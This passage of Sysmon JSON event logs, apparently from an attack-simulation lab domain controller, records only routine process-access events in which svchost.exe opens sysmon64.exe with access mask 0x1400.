C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:44.742","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6333,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:44.742\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:44.742","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6334,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:44.742\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:44.742","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6335,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:44.742\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:44.742","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6336,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:44.742\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:44.742","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6337,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:44.742\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:44.742","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6338,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:44.742\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:44.742","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6339,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:44.742\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:44.742","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6340,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:44.742\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 